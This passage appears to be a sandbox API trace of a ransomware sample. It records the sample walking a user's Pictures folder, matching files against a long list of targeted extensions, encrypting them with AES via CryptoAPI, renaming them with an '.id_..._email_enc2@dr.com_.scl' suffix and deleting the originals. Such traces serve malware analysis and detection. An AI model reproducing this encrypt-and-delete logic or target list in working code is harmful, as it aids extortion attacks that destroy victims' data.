cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.418] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.418] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.419] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.419] ReadFile (in: hFile=0x384, lpBuffer=0xfc51f8, nNumberOfBytesToRead=0xad6, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfc51f8*, lpNumberOfBytesRead=0x18c060*=0xad6, lpOverlapped=0x0) returned 1
	[0196.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.422] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb2a8) returned 1
	[0196.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.425] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.425] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.425] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.426] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xad6, dwBufLen=0xad6 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xae0) returned 1
	[0196.426] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.426] RtlMoveMemory (in: Destination=0xfda3a0, Source=0xfc51f8, Length=0xad6 | out: Destination=0xfda3a0) 
	[0196.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.426] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfda3a0*, pdwDataLen=0x18bc0c*=0xad6, dwBufLen=0xae0 | out: pbData=0xfda3a0*, pdwDataLen=0x18bc0c*=0xae0) returned 1
	[0196.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.427] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.427] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.427] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0196.427] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.427] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.428] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.429] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 86
	[0196.429] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.430] WriteFile (in: hFile=0x2c0, lpBuffer=0xfda3a0*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfda3a0*, lpNumberOfBytesWritten=0x18c068*=0xae0, lpOverlapped=0x0) returned 1
	[0196.433] CloseHandle (hObject=0x2c0) returned 1
	[0196.434] CloseHandle (hObject=0x384) returned 1
	[0196.434] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png")) returned 1
	[0196.437] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\we1ovw4nq.png")) returned 0
	[0196.437] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba62f540, ftCreationTime.dwHighDateTime=0x1d97430, ftLastAccessTime.dwLowDateTime=0x75f4c240, ftLastAccessTime.dwHighDateTime=0x1d976a0, ftLastWriteTime.dwLowDateTime=0x75f4c240, ftLastWriteTime.dwHighDateTime=0x1d976a0, nFileSizeHigh=0x0, nFileSizeLow=0x10b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z2RADGjXb42CWJf.gif", cAlternateFileName="Z2RADG~1.GIF")) returned 1
	[0196.437] lstrcmpW (lpString1="Z2RADGjXb42CWJf.gif", lpString2="..") returned 1
	[0196.437] lstrcmpW (lpString1="Z2RADGjXb42CWJf.gif", lpString2=".") returned 1
	[0196.437] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.437] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="Z2RADGjXb42CWJf.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Z2RADGjXb42CWJf.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Z2RADGjXb42CWJf.gif"
	[0196.438] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Z2RADGjXb42CWJf.gif") returned 50
	[0196.438] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.438] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Z2RADGjXb42CWJf.gif", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif") returned 0x32
	[0196.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.438] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.438] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif"
	[0196.438] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif") returned 50
	[0196.439] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.439] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0196.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.439] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.440] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.440] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.440] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.440] ReadFile (in: hFile=0x384, lpBuffer=0xfda128, nNumberOfBytesToRead=0x10b0, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18c060*=0x10b0, lpOverlapped=0x0) returned 1
	[0196.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.444] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0196.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.446] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.446] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.447] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.447] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x10b0, dwBufLen=0x10b0 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x10c0) returned 1
	[0196.447] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.447] RtlMoveMemory (in: Destination=0xfdb1e0, Source=0xfda128, Length=0x10b0 | out: Destination=0xfdb1e0) 
	[0196.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.448] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdb1e0*, pdwDataLen=0x18bc0c*=0x10b0, dwBufLen=0x10c0 | out: pbData=0xfdb1e0*, pdwDataLen=0x18bc0c*=0x10c0) returned 1
	[0196.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.449] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.449] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.449] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0196.449] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.450] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.450] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.451] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 92
	[0196.452] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.452] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdb1e0*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdb1e0*, lpNumberOfBytesWritten=0x18c068*=0x10c0, lpOverlapped=0x0) returned 1
	[0196.455] CloseHandle (hObject=0x2c0) returned 1
	[0196.455] CloseHandle (hObject=0x384) returned 1
